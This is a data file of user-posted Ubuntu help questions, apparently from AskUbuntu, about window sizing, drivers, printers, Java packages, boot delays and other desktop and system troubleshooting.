109320	how do i make resizing dialogues and windows stick permanently ?	on my netbook with a resolution of 1024x768 , dialogues , like `` file open '' dialogue or `` windows '' , like the file manager window are opened so that the height of the dialogue/window is too huge . every time , i have to press the alt button , move the dialogue/window and resize it , to use it normally . something that is really anoying , especially , because ubuntu already knows ( like i can see in the dash - that is set to netbook ) about the monitor form factor . all the netbooks have a display 1024x576 or 1024x600 - so it would be nice , if the dialogues would be resized to not extent over the borders . another option would be , if i could resize dialogues/windows - and `` save '' the form after it , so next time , it would open with exactly the new size . i tried the f5 button - but that is not a solution . so i 'd ask , if anyone knows a solution to solve this unlucky behaviour .
109321	popup dialogs attached to window title and not movable	not sure of the terminology here , but most of my popup dialogs ( see screenshot below ) are attached to the window title and can not be moved . if the parent window is moved , the popup moves with it . is there a way to get rid of this and have all popup dialogs be opened as movable windows ? ( ubuntu 11.10 with cinnamon . )
109336	vnc alternative	is there an alternative to vnc available which is on par with the features in windows remote desktop ? no configuration except possible switching it on . authentication should be done just like a local logon . automatic adjust the screen size/resolution to match the remote client . automatically disable any ui features which are not compatible with the remote client ( such as 3d acceleration ) .
109338	how do i disable mouse magnet on middle edge with multi monitors ?	i use ubuntu 12.04 on a two screen setup . multiscreen on 12.04 has generally become much better , but there is one thing that really gets on my nerves : there 's a mouse magnet of sorts on the middle edge ( between the two screens ) . it 's undoubtedly there to make it easier to interact with the launcher on the right screen . but i have enough trust in my mousing skills , the magnet is more annoying than helpful in my case . can i disable it somehow ?
109341	file wont delete from trash even after sudo rm -rf ~/.local/share/trash/	i 've tried using sudo rm -rf ~/.local/share/trash/files/ and even going myself as root doing the same , and recreating the folder its still there , it was from a pendrive at one point and i deleted it but now i cant get it to delete permanently . anyone have any suggestions ?
109343	install brother mfc7360n scanner	i am looking to install brother mfc 7360.i have installed printer but as scanner concerned it is not working everytime when i try to run xsane it says device not connected , when i try to add brscan-skey to startup program it asks for command line . i am not sure what shall i write in command line . please help me thank and regards , gourik goswami
109345	no `` touchpad tab '' under mouse and touchpad settings . detected as ps/2 generic mouse	i have a dell inspiron with ubuntu 12.04 installed . i can use my touchpad fine but i ca n't scroll with it . when i run windows it uses two finger scrolling but for some reason it wo n't work on ubuntu . i went to my mouse and touchpad settings but there is no touchpad tab , only a mouse tab . when i run xinput list i get the following : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎜ ↳ pixart usb optical mouse id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=14 [ slave keyboard ( 3 ) ] apparently my touchpad is detected as a ps/2 generic mouse . is there a way to fix this ? ? i 've had this problem with ubuntu 11.10 and when i upgraded to 12.04 today the problem still exists . the reason this is bugging me is because whenever i type , my pointer goes erratic and often makes me mistype ( at least in windows , this happens because i have touchpad driver installed ) .
109347	can i stream netflix to ubuntu via a mac ?	right now i 'm dual-booting ubuntu and os x . the only thing i use os x for is watching the drm-ed netflix stream . i 've looked into ways of watching netflix on ubuntu , but it seems the drm basically makes that impossible ( moonlight project says unless netflix drops the drm their silverlight replacement will not allow watching of netflix ) . but then i realized , hey what if i stream netflix to another computer running say , os x , then somehow redirect it ( using unix magic ) to my ubuntu machine ? is this possible ?
109354	is there a podcasts player which remembers the time ?	i tried out many different programs like gpodder , rhythmbox and banshee , but with none , the program remembers the played time . is there a player which can do that and download automatically the newest podcasts ?
109357	why is the 11.10 iso so much larger than the 11.04 one ?	wanted to download ubuntu and i just saw that ubuntu-11.04-dvd-amd64.iso is 4gb while the ubuntu-11.10-dvd-amd64.iso is only 1.5gb . why the difference in size ? is there something missing form 11.10 ? if yes , what 's the release number with `` the most complete set of applications '' ?
109359	integrate vlc 2 in the sound menu	how to integrate vlc control 2 in the sound menu ubuntu 11.10 ? i activated the vlc options of mprisv2 and nothing happens .
109363	how to opt out of updates for a particular package ?	how can i set the update-manager so that all files / packages related to ubuntu one are no longer seen as required or needed update ?
109371	removing unnecessary libs	i played around a lot with installing wine and some stuff for party poker . also i was following some tutorials on installing adobeair on x64 system . i believe i have downloaded quite a lot - > 200mb stuff which i will not ever use , are there some tools that will help me to erase anything that is incompatible with my system ? for example i did not notice that i am downloading stuff for ubuntu 9 , even though i have ubuntu 11 etc .
109374	arm cortex a8 freescale i.mx515 still supported in 12.04 ?	i want to buy a arm based netbook ( herkules ecafăš slim hd ) with arm cortex a8 freescale i.mx515 . the netbook comes preinstalled with ubuntu , i guess 10.04 . is this arm controller still supported in precise ?
109375	ca n't enable wireless in ubuntu 11.10	i 'm using lenovo b570 , it has got bcm4313 wlan chip from broadcom corp ... the problem is that i 'm not able to `` enable wireless '' from gui . even if enable wlan0 manually from terminal `` ip link set wlan0 up '' .. it still fails to show the access points and even could n't connect to any access point even from terminal ...
109376	11.10 spell checking and texworks	when i use texworks there is no automatic spell checking . if i go edit - > spelling , the only option i have is none how can i enable spell checking ? thanks for your help
109381	how to add path of a program to $ path environment variable ?	i need to use a program in my job . i followed the installation instructions of this program . however , when i try to run it the message appears - program_that_i_want_to_run : command not found i know that it is a $ path problem , but i tried the command line described in the instructions and it did not work . set environment variable config_path export config_path=/my_path_to_program/program/config/ i am sure that i indicated correctly the path to access the config directory . no typing errors . help ?
109382	how to configure kde default settings for a new user of a group ?	i 'm a sys admin on kubuntu 11.10 machine . where do i configure the basic config for a new user ( say belonging to group `` users '' ) ? edit 1 : i want to configure langauages - currently my new users get english and bulgarian languages . i want them to get english and russian - and also to set alt-capslock - to be the input-language-switching-combination . edit 2 : how do i configure things in /usr/share/kde4 when i do kdesudo systemsettings and save configurations - only root settings got changed - not the /usr/share/kde4 ones . edit 3 : new user gets the /etc/skel files controlling bash behaviour-appearence . what about the kde new user 's default files - where are they stored ? edit 4 : oh , i found some hints : kde4-config -- path config gives a list of folders ( separated by the colon ) where kde looks for configs . my machine responded with : /home/boris/.kde/share/config/ /etc/kde4/ /usr/share/kubuntu-default-settings/kde4-profile/default/share/config/ /usr/share/kde4/config/ /usr/share/desktop-base/profiles/kde-profile/share/config/ it looks like third line is where kde takes the default options . so i found these zilions of settings - but no gui way to configure it ( ( . edit 5 : finally , i 've created a dummy user , configured it , and wrote a script which gives it 's settings to a given user ( s ) . the trick - is to chown after one transfered the dot files from one user to another . i 've tested it - it works fine .
109383	why is my ati graphics driver not working ?	i just installed ubuntu day ago and im total newb in this system . after installation and ubuntu update i found out in `` system info- '' graphics '' : driver-unknown , expirience-standard after that i found `` aditional drivers '' utility in `` system settings '' and i found there 2 proprietary drivers : ati/amd proprietary fglrx graphics driver ( post-release updates ) ati/amd proprietary fglrx graphics driver when i activate first , it shows me error and it wont install . when i activate second , installs fine and asks for restart and after i restart graphics are slow and choppy , and youtube vids are slower then when was with no driver . and `` system info- '' graphics '' shows next : driver-vesa : rs780mn expirience-standard my graphics card is ati radeon hd 3200 my netbook is lenovo x100e *update i uninstalled ati/amd proprietary fglrx graphics driver and manually installed driver i downloaded from oficiall ati site and system 's graphics are still choppy . i can opet ati catalyst control center , and it detect my graphics card , and everything looks fine but system is still choppy .
109384	usb ports at 10volt	there is a small `` driver '' from asus , ai charger , that turns the pc 's usb ports into 10v power supplier , which allows me to charge my ipad from my computer . problem is , this only works on windows . is there any way to do the same on linux ? thanks
109393	errors when trying to install the , default-jre-headless package from the synaptic package manager	i am trying to install the java re and java dk in ubuntu 10.04 lts . i tried using this link ubuntu help java . i used the first link for installing and clicked yes . i was warned that some of the packages were not able to be downloaded . i click to proceed , and afterwards the following message was brought up as an error having occurred : w : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b20-1.9.10-0ubuntu1~10.04.3_all.deb 404 not found [ ip : 91.189.92.167 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b20-1.9.10-0ubuntu1~10.04.3_i386.deb 404 not found [ ip : 91.189.92.167 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b20-1.9.10-0ubuntu1~10.04.3_i386.deb 404 not found [ ip : 91.189.92.167 80 ] i went to the terminal and used java -version to get this output : alex @ alex-laptop : ~ $ java -version the program 'java ' can be found in the following packages : * gcj-4.4-jre-headless * openjdk-6-jre-headless * cacao * gij-4.3 * jamvm try : sudo apt-get install < selected package > this was the same output as before though . i subsequently tried to install via the synaptic package manager choosing default-jre-headless 1.6-34 which included the openjdk-6-jre-headless as well as other packages . this gave me the same errors as before using the web install . was the installation aborted due to these errors ? if these failed are alternative download methods or is the error from my connection or system configuration ? how to then proceed with installing java re and then java dk ? or is it simply a server/connection problem that will get fixed in time and i should try again later ? update : i ran sudo apt-get install openjdk-6-jre-headless and the installation failed again giving e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
109394	using aptdcon or other apps in non-interactive script ( s ) ?	i was trying to find a way in order to use aptdcon -- the command line client for aptdaemon in a script . aptdcon misses options such as : loggable output - no progress indicator . assume no to all queries and do not prompt . the following package will be upgraded ( 1 ) : xxx need to get xxx of archives . do you want to continue [ y/n ] ? so aptdcon prompts for a user response making it inappropriate for shell scripts . how can i use aptdcon or any other app ( that does n't need root permissions ) in non user-interactive scripts ?
109404	how do i install latest php in supported ubuntu versions ( like 5.4.x in ubuntu 12.04 ) ?	i am trying to update to php 5.4 in ubuntu 12.04 , and i can only get 5.3.6 using official repositories ( using apt-get ) . i 'm not really sure how to do a manual update â i 'm sorta new to ubuntu , but i need to play around with the new php features !
109413	how do i use overlayfs ?	this answer and email message indicate that something called `` overlayfs '' is available in ubuntu 11.10 and will forcefully replace aufs in ubuntu 12.04 . how do i use it ? where is its documentation ?
109424	user extension location for nautilus 3	where ( under my home directory ) do i put python extensions for nautilus 3 ?
109425	super cow powers ?	i did `` apt-get -- help '' and at the end of the output it said `` this apt has super cow powers . '' i have never seen this message before . can anyone tell me what it means ? thanks ahead of time for your input .
109429	how can i publish a newsletter through the ubuntu software center ?	i have a tech newsletter that i 'd like to publish through the usc and i was wondering how to do it ?
109430	commands for installing unity on ubuntu minimal desktop	i want to know what to put in the terminal to install unity de on ubuntu 11.10 minimal . for example.sudo apt-get install ( whatever goes here ) including the dependencies .
109438	previewing images before opening ?	if anyone is familiar with windows 7 , you can change the view to `` thumbnail '' and see what the image is before opening the file . i noticed on ubuntu that pdf files show a preview , but it seems like .jpg files does n't . can this be changed so i can preview the image without opening the file ?
109445	how can i uninstall adobe acroread ?	i want to uninstall acroread that i downloaded from adobe 's website and installed . how can i do that ?
109446	how can i lock docky ?	i set up ubuntu with docky and xfce for my mother . but sometimes she accidentially removes apps from docky by letting them `` drop '' on the desktop . is there a way to lock docky , so the programs ca n't be removed that easily ?
109448	how to change the permission of my internal cd/dvd drive ?	i decided to build my own gui ( ubuntu server , openbox and stuff ) . i am having a permissions problem with my cd drive . when i try to mount it with user privileges it tells me that i 'm not allowed . i can then mount it as root , and can see the content in the root window , but as a normal user i 'm still not allowed to view the contents . so my question here is , how can i configure it in a way that it mounts my cd/dvd 's always with my reading permissions ? sudo df -h : filesystem size used avail use % mounted on /dev/sda1 19g 6.5g 12g 37 % / udev 995m 4.0k 995m 1 % /dev tmpfs 402m 528k 401m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1004m 4.0k 1004m 1 % /run/shm /dev/sda4 420g 306g 92g 77 % /home /dev/sda5 20g 16k 20g 1 % /windows /dev/sr0 6.1g 6.1g 0 100 % /media/bioshock
109452	how can i uninstall graphics driver ?	i want to un-install graphics driver but i do not know how . i downloaded amd catalystâ˘ 11.11 proprietary linux x86 display driver .run file from support.amd.com and installed it manually . now , i ca n't find how to un-install it *edit1 i enter `` sudo sh /usr/share/ati/fglrx-uninstall.sh '' in terminal and in next line it asks me for password . and i ca n't type , everything i type do n't appear in terminal *edit2 turns out that password can be typed in but cursor is not moving as you type it and that fooled me .
109456	show icons in menues and buttons	how do i enable icons in the menues ( file-edit- ... ) and also right-click-menues ( refresh-copy-paste- ... ) and on the buttons ( ok-cancel-yes-no- ... ) in ubuntu 11.10 ? i would like it to work the way it does on linux mint or zorin os . cheers , kalsan
109459	dual nvidia gpus ( 3 monitors ) not working in 11.10	after searching i have not found a solution . i have 2 nvidia quadro 295 cards with 3 monitors but i can not extend twinview across multiple gpus . i have the most recent nvidia proprietary drivers installed , and they work fine for the single gpu / dual monitors . i tried using xinerama , but without success . i do n't mind switching to the nouveau drivers if that would handle my multiple monitors , although i would like to continue to use unity and compiz if i can ) .
109460	how do i get a brother dcp-315cn printer working ?	i need detailed instructions for an absolute beginner to install my brother dcp-315cn under ubuntu 11.10 . i hope someone can help me with this problem .
109464	microsoft bluetooth notebook mouse 5000 not detected	ubuntu 11.10 can not detect my bluetooth mouse at all ( it does n't appear at all using `` set up new device '' after clicking on the bluetooth icon at the top of the screen ) . obviously the wireless switch is on and also the bluetooth is on . my pc is sony vaio vpcm13m1e . anyone can help me please ?
109466	firefox could not initialize application security crash	hi there i installed ubuntu a few minutes ago ( i 'm very new on ubuntu ) and whenever i want to open firefox i get an error which starts with `` could not initialize application security ... '' . also when i try to restart ubuntu it stops and i have to shut-down manually with the power button . during the shutdown there is a message killing all remaining processes -- > fail i will be glad if you can help me and thanks anyway
109471	`` input not supported '' at login screen after ati driver is installed	i 'm running ubuntu 11.10 and i installed the ati driver from the oficial page . when i reboot , the grub and the splash screen are working ( at lower resolution ) but instead of the login screen , it shows `` input not supported '' message . if i use `` ctrl+alt+ keypad + '' i can see my login screen at 640x480 resolution and login . i do n't know how to make login screen displays 1440x900 @ 60 , that is the resolution set on my session . i 'm running ubuntu 11.10 with ati hd4200 video card , a monitor acer al1916w that supports the resolution 1440x900 .
109477	resolv.conf auto reset by dnsmasq after install libvirt-bin	after i install libvirt-bin and ubuntu-virt-server , etc. , my resolv.conf gets overwritten by dnsmasq about every hour . i have n't installed network-manager and resolvconf . when i search for dnsmasq i see that only dnsmasq-base has been installed . when i try to remove dnsmasq-base , libvirt-bin will be removed automatically . how to keep dns config not be changed ? i use ubuntu 11.10 thanks for every reply . edit : $ dpkg -- list | grep dnsmasq $ ii dnsmasq-base 2.57-1ubuntu1 a small caching dns proxy and dhcp/tftp server $ pgrep dnsmasq 1088 in my syslog file : dnsmasq [ 1088 ] : reading /etc/resolv.conf dnsmasq [ 1088 ] : using nameserver 192.168.1.1 # 53
109487	access more options via gnome power manager	im running ubuntu 11.10 & am using the gnome interface . i have installed the gnome power manager and i am assuming this is it : this does n't have that many options . i 've seem some screen shots of the power manager and they seem to show the gnome power manager with alot of the options i want to have control over . so my over question is this : is this the gnome power manager & if it is , then how can i access more options ? edit : the other screen shot i am referring to is the one available when viewing the gnome power manager via synaptic , or even something like this
109488	how can i run this script on startup , restart , and shutdown ?	i 'm using ubuntu 11.10 . i 've written a script , that synchronises a directory in ~ with a directory on /dev/sda4 , using unison . before , i had this script running every five minutes with no problems , using crontab . right now , i want to execute this script at startup , restart and shutdown only . this is what the script looks like : # ! /bin/bash unison -perms 0 -batch `` /mnt/data/syncfolder/ '' `` /home/myname/syncfolder/ '' i 'd like the script to be run with mechanisms like upstart , if possible . so i 'd be happiest with a properly configured *.conf file in /etc/init . thanks in advance .
109489	where can i find network manager 's gconf key ?	i did it again : when vpn notified me that a vpn-connection was not successful ( in gnome 3 ) i accidentially clicked `` do n't show this notification again '' ( see accidentally clicked `` do n't show this message again '' - how to reactivate ? ) now i ca n't find the corresponding key in gconf and dconf . do you know where it is ? how can i search for keys ?
109500	boot issues - long delay , then `` gave up waiting for root device ''	i 've had this issue on and off for about two years now . i noticed it on a new ( custom built ) machine running 10.04 when that first came out , but then it went away until a few months ago . i 've gone through a number of hard drive changes but i ca n't say specifically what if anything i changed hardware-wise to make it stop or start happening . i had assumed upgrading to a modern ubuntu version would fix the issue , so i installed 12.04 beta on a spare partition last night , but it 's still happening . here 's the issue . after grub loads and i select a kernel to boot , the screen goes blank save for a blinking cursor . it sits in this state for many long minutes before it finally gives up and gives me an initramfs shell with the message gave up waiting for root device ( and lists the /dev/disk/by-uuid/ ... path it was waiting for ) but no other specific diagnostic information . now , here 's the tricky part . for one , the problem is intermittent - sometimes it progresses from the blinking cursor to the ubuntu splash boot screen in a few seconds , and once it gets that far it always continues booting fine . the really bizarre thing is that i can `` force '' it to `` find '' the root device by repeatedly pressing the space bar and hitting the machine 's power button . if i tap those enough , eventually i will notice the hard drive light coming on , at which point it will always continue the boot process after a few seconds . interestingly , if i wait slightly too long before pressing the power button ( 30s ? ) , as soon as i press it i get the gave up waiting message and the initramfs shell . i 've tried setting up /etc/fstab ( and the grub menu.lst or whatever it 's called nowadays ) to use device names ( e.g . /dev/sda1 ) instead of uuids , but i get the same effect just with the device name , not uuid , in the error message . i should also mention that when i boot to windows 7 , there is no issue . it boots slowly all the time just by virtue of being windows , but it never hangs indefinitely . this would seem to indicate it 's a problem in ubuntu , not the hardware . it 's pretty annoying to have to babysit the computer every time it boots . any ideas ? i 'm at a loss . not even sure how to diagnose the issue . thanks ! edit : here 's some dmesg output from 10.04 . the 15 second gap is where it was doing nothing . i pressed the power button and space bar a few times , and the stuff at 16 seconds happened . not sure what any of it means . [ 1.320250 ] scsi18 : ahci [ 1.320294 ] scsi19 : ahci [ 1.320320 ] ata19 : sata max udma/133 abar m8192 @ 0xfd4fe000 port 0xfd4fe100 ir q 18 [ 1.320323 ] ata20 : sata max udma/133 abar m8192 @ 0xfd4fe000 port 0xfd4fe180 ir q 18 [ 1.403886 ] usb 2-4 : new high speed usb device using ehci_hcd and address 4 [ 1.562558 ] usb 2-4 : configuration # 1 chosen from 1 choice [ 16.477824 ] ata16 : sata link down ( sstatus 0 scontrol 300 ) [ 16.477843 ] ata19 : sata link down ( sstatus 0 scontrol 300 ) [ 16.477857 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) [ 16.477895 ] ata15 : sata link down ( sstatus 0 scontrol 300 ) [ 16.477906 ] ata20 : sata link down ( sstatus 0 scontrol 300 ) [ 16.477977 ] ata17 : sata link down ( sstatus 0 scontrol 300 ) [ 16.478003 ] ata12 : sata link down ( sstatus 0 scontrol 300 ) [ 16.478046 ] ata13 : sata link down ( sstatus 0 scontrol 300 ) [ 16.478063 ] ata14 : sata link down ( sstatus 0 scontrol 300 ) [ 16.478108 ] ata11 : sata link down ( sstatus 0 scontrol 300 ) [ 16.478123 ] ata18 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 16.478127 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) [ 16.478157 ] ata5 : sata link down ( sstatus 0 scontrol 300 ) [ 16.478193 ] ata18.00 : atapi : marvell virtuall , 1.09 , max udma/66 after that , it took its sweet time , and i had to keep hitting space bar to coax it along . here 's some more dmesg output from a little later in the boot process : [ 17.982291 ] input : btc usb multimedia keyboard as /devices/pci0000:00/0000:00 :13.0/usb5/5-2/5-2:1.0/input/input4 [ 17.982335 ] generic-usb 0003:046e:5506.0002 : input , hidraw1 : usb hid v1.10 key board [ btc usb multimedia keyboard ] on usb-0000:00:13.0-2/input0 [ 18.005211 ] input : btc usb multimedia keyboard as /devices/pci0000:00/0000:00 :13.0/usb5/5-2/5-2:1.1/input/input5 [ 18.005274 ] generic-usb 0003:046e:5506.0003 : input , hiddev96 , hidraw2 : usb hid v1.10 device [ btc usb multimedia keyboard ] on usb-0000:00:13.0-2/input1 [ 22.484906 ] ext4-fs ( sda6 ) : info : recovery required on readonly filesystem [ 22.484910 ] ext4-fs ( sda6 ) : write access will be enabled during recovery [ 22.548542 ] ext4-fs ( sda6 ) : recovery complete [ 22.549074 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode [ 32.516772 ] adding 20482832k swap on /dev/sda5 . priority : -1 extents:1 across:20482832k [ 32.742540 ] udev : starting version 151 [ 33.002004 ] bluetooth : atheros ar30xx firmware driver ver 1.0 [ 33.008135 ] parport_pc 00:09 : reported by plug and play acpi [ 33.008186 ] parport0 : pc-style at 0x378 , irq 7 [ pcspp , tristate ] [ 33.012076 ] lp : driver loaded but no devices found [ 33.037271 ] ppdev : user-space parallel port driver [ 33.090256 ] lp0 : using parport0 ( interrupt-driven ) . any clues in there ? further edit : some screenshots of dmesg output from the initramfs busybox shell when it fails : i tried fossfreedom 's suggestion of trying a number boot options . so far , it looks like irqpoll is actually working ! i 've booted four times successfully with it so far . ( as a side note , i ca n't get irqpoll to stick -- i edited /etc/default/grub to add it to grub_cmdline_linux_default and ran update-grub , but still nothin ' . what am i missing ? ) ( my grub was hosed somehow when installing the other ubuntus . i fixed it and am seeing irqpoll always now . ) given that , what is the problem here ? it sounds like irqpoll is a hack to get bioses that somehow do n't adhere to some irq standard to work with linux . how do i figure out what component is the issue , and is there another solution to get linux to play nice with it that does n't involve what sounds like so much overhead ?
109505	how do i access an external hard drive plugged into my router ?	i am running ubuntu 11.10 and i own a netgear n600 wireless dual band router with a usb port built into it . naturally , the router came with instructions on how to mount and view this drive with both windows and mac , but nothing about linux . i have an wd elements 1 tb external hdd that i would like to plug into the router and share across my home network . however , when i plug it in , absolutely nothing happens on my desktop . i checked on two different machines and nothing seems to indicate that the drive has been mounted ( or is even seen at all ) on either machine . i am fully aware that it may not be possible to do this with a linux system , but i was hoping someone might have a suggestion .
109507	smbclient getting nt_status_logon_failure connecting to windows box	i 'm running smbclient on ubuntu , trying to connect to a windows box , and i 'm getting `` session setup failed : nt_status_logon_failure '' . i 've verifed that i can ping the box and telnet to ports 139/445 , so i 'm pretty sure that it 's not a firewall issue . and my client says that they can connect to this windows box from another windows box with the userid/password combination without issue . also , this box can connect via smbclient to other windows boxes that this client has . any other ideas for why this is n't working ?
109516	managing dependency across upstart and sysv-style init.d script	i have an upstart job that must run before a sysv-style init.d script runs . the init.d script is configured to be started in the runlevels 2 , 3 , 4 and 5 with priority 20 . what can i do to have the upstart job to start earlier than the init.d script ?
109517	how do i encrypt all my hard disk and not only the home directory	how do i encrypt all my hard disk and not only the home directory , so it would ask me for a password when it boots and try to mount the hard disk to start ubuntu ? i just wan na my system be 100 % secure .
109518	how do i access phpmyadmin ?	i 've installed phpmyadmin but i do n't seem to be able to access it . i have tried browsing to both localhost/phpmyadmin and 94.249.188.109/phpmyadmin and it still says `` not found '' . how do i access phpmyadmin ?
109521	transfering kernel image to another system	my server system is low on disk . to install a new kernel i think i shall do the following : compile the kernel on another system . copy bzimage along with config , system.map and of course the laodable module in /lib/modules and transfer them to the server . now , i can remove the server 's old kernel to free up the space and put the the files in /boot as well as copying loadable modules to no , ... this is not the way , this way i need to make the drivers the image as well . there 's another way , in ubuntu i can make .deb files of the headers and the linux , if i transfer only those two files to the server , i think i can install the new kernel using dpkg . what do you think ?
109530	how do i restore my kde desktop to default ?	i am really a newbie in linux . finally my sister gave me my old laptop back and i decide to install kubuntu 11.10 on it . i am really happy with this linux distribution and i already have personalized it quite a bit . but i also realised that linux is much more sensetive when you reboot it in comparison to windows ! ; ) so , since i have switched off the laptop once with out properly press reboot in linux , the buttons and the writing in the windows in the very top seem as if they 'd be too big . looks like a bug actually to me . and if you make the windows smaller it looks really strange and the close and minimize and resize buttons disappear . i have already once fixed this by inserting the kubuntu cd , but i forgot how i did that . i think it was something like restore distribuion or so , but all personalizations kept the same , only the windows were displayed normally ( which i of course have intended ! ) excuse me , if i have expressed myself not quite clear . i hope someone of you can help me anyway ... question : what have i done to restore kde ? thanks in advance , thomas
109534	ubuntu 11.10 as vmware player guest os has window redraw issues	i 'm running ubuntu 11.10 64bit as a guest os inside vmware player 4.0.2 on a windows 7 64 bit host os . i have the latest vmware tools installed ( reinstalled it just in case ) . i 'm using gnome classic , not unity . i 'm finding that i run into screen redraw issues . if i move a window around , parts of the ui disappear . if menu pops up , pieces of it are left behind . this disappears after resizing the window ( forcing a redraw ) , but that 's very annoying . i have another ubuntu 11.04 vm that does not run into this issue . an example of the redraw issue can be found below . any help would be appreciated . thank you .
109536	soundblaster sb x-i card ?	fresh new install of precise beta and its not picking up my sound card at all . anyone know how to get this sound card to work ? thanks
109538	how to get the unity bar only hide when a window is maximize	how do i do this ? in ubuntu 12.04 it never go away or when a window was n't maximize it go way anyways . i do n't like that . how can i make it like it was in ubuntu 11.10 , 11.04 , 10.10 netbook editon the unity bar only goway when a window is maximize on that desktop .
109543	can i revert to a normal google broswer instead of the streamlined 'ubuntu start page '	when i open firefox browser in ubuntu , i am presented with a streamlined google search interface . oftentimes , i am looking for images , so i have to 'google ' google , in order to get the the main google search site ( which has links to 'images - maps - youtube - etc ... in the header ) . it 's not a huge problem , but when searching for images for clients dozens of times a day it gets a bit frustrating having that extra step . does anyone know how to display your home page in firefox as the default google page , as opposed to the streamlined ubuntu version ? thanks for the help .
109547	gnomebaker cd/dvd writer no longer lets me burn dvd 's or cd 's	is there a way to fix this problem with gnomebaker cd/dvd writer ? when it wo n't burn , it gives this output : perform opc failed with sk=3h/power calibration area error ] : input/output error â
109548	evolution and office 365	in evolution mail there is an option to create an account for exchange with an owa address . does someone have an idea how to get the required data from office 365 to get working in evolution ? microsoft support did not help and refused my help request because of the word ubuntu in the post ; ) the owa url is https : //amsprd0302.outlook.com/owa but i do not know what username and mailbox name to use .
109553	my alfa awus036nh wireless card autorun installation disk will not run	i recently purchased an alfa awus036nh wireless card . the installation is seamless on my windows machines , but the install cd will not run on my linux machines . the wireless card will show up as wlan1 ( which is a good thing right ? ) on my linux machines alongside my wlan0 , and i can use it with no problems ... but the perplexing thing is i cant get the software to autorun and install . normally i would n't care , but the alfa card has a nice gui for managing available wireless networks , and it would be great to have that gui on my linux machines like alfa advertises . ( i.e . 'works with linux ! ' ) long story short , when i run the setup.exe , nothing happens , but i am able to view the files through the gui on my optical drive . could it be i need to 'sudo apt-get ' something to autorun the software ? thanks for the help !
109560	why did my desktop revert to a previous version ?	i have ubuntu 11.10 installed . i shut down my computer last night , got up this morning ( my kids had been trying to monkey around with it , thank god for the password protect ) and when i opened my laptop up , it was already on and prompted me for my password . after i did that , it logged on properly , but instead of my 11.10 desktop , i am seeing the 10.04 desktop . by this i mean , that the `` applications/places '' top bar menu is there with the bottom bar that lists what windows you have open , but the crazy thing is , that when i go into `` system settings '' from clicking on my name , the set up of everything else is 11.10 ... ... ..i dont get it ... ..help ?
109568	redirect compiz effects ?	so i use regular unity and i like the panel and the dash but what i do n't like is the launcher . i prefer to use docky with the magic lamp effect from compiz . the problem is when i minimise things , the animation goes to the icon in the launcher which i have set to autohide and the icon peeks out from the side for the animation . it 's really annoying . is there anyway i can stop this or possibly remove the launcher while keeping the unity panel and the dash ? thanks
109571	open file dialog defaults to showing hidden files	my open file dialog is defaulting to showing hidden files , i have to press ctrl-h to get to the files i want , but this is not saved across instances of the dialog . i ca n't find a settings panel to change this behaviour , including nautilus preferences , nor a key in the configuration editor . is there a way to have the open file dialog default to not show hidden files ?
109577	doubt related to wireless mouse	this is something new to me , so i need help , please . i need to buy a wifi mouse , but i do n't know if it 's going to work on my ubuntu 11.10 . i 've seen some mice here and all of them mention windows or mac . none of them mentions linux . so , what do you have to say ? with the experience you have , do you know if this kind of mouse works normally on linux ( ubuntu ) ? do you recommend any specific brand ? another doubt i have is ... when they say `` wifi '' mouse , what is this `` wifi '' exactly ? is it bluetooth or a specific wifi system just for the mouse ? all the mice i 've seen come with a usb dongle . so , is this dongle a bluetooth adaptor or a specific wifi adaptor just for the mouse itself ? i 'm asking this because , if this dongle is a bluetooh one , i guess i wo n't need it because my laptop has a native bluetooth feature . thanks for your time , guys . : ) brunces
109579	gnome 'super- # ' hotkey like in unity	i 've been using unity for a while , and just switched to gnome . ( gnome 3.2 on ubuntu 11.10 ) i 've liked it a lot , but it 's missing one key feature ( in my mind ) . in unity you can use the super button with a number key to open an app on the launcher . for example : chromium is my second app on the unity launcher , so i can press super-2 to launch it . is there any way to do this in gnome ? thanks in advance .
109580	does booting a live usb ( with persistence turned off ) cause writes to occur to it ?	i know that ubuntu will not and can not write to a live cd-r/dvd+-r when it is booting from it , as it is a read-only medium . however , the procedure ( at least on the data level ) for running ubuntu off an optical disc is different from a usb drive , which is usually write-enabled . if i make a live usb , turn off persistent files , and boot from it , will any data be written to the usb drive ( e.g . settings , error logs , temporary files ) ? or will ubuntu just read from it , nothing else ?
109583	with java being purged from the repo 's , what does this mean for minecraft ?	i am running ubuntu 12.04 beta 1 lts on a separate partition on my hd . now , i read on web upd8 awhile back that oracle had dropped support for linux , so java had to be purged from the repo 's . it did n't affect ubuntu 11.10 as far as i could see , so it did n't bug me at the time . now that i am trying to be a beta tester for ubuntu , i noticed that in fact java was completely gone from the repo 's . old ppa 's were n't recognized , it 's not in the software center , etc ... anyway , enough dragging this out . what does this mean for games/sites that require java to run on linux ( minecraft , speedtest.net , etc ... ) any ideas how to get it working in 12.04 or are we just officially out of luck till an opensoure alternative comes along ? thanks for any information/help you can provide , if any ! bye guys !
